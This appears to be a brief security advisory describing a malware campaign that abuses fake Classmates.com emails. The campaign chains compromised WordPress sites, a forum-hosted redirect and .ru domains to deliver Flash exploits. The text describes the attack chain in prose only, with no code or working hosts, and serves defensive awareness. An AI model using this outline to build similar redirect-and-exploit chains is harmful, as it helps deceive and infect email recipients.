Classmates.com has become the latest in a series of well-known brands to be abused by a particular gang of malware distributors. The similarities to other outbreaks include:
- Linking to multiple compromised sites which then redirect to the malware hosting sites
- Favoring WordPress sites (that can be exploited)
- Hosting the malware on various .ru domains
- Showing simple messages on the malware page such as “Please Wait – Loading” (black text on white)
- Using the same Flash exploits in the malware
The Classmates.com email thanks the recipient for joining and provides links to confirm the user or make corrections.
Once again the initial link is to a compromised WordPress site. A script hidden on this site dynamically builds a redirect to a forum site. Here, a second script embedded in a forum post directs to the final .ru domain which displays the expected “Loading” message. This “double-hop” is a slight change from previous similar attacks.
The malware on the final site checks for PDF and Flash versions on the target PC.
- If an appropriate version is found it then redirects to a malicious SWF flash file.
- If not it redirects to google.de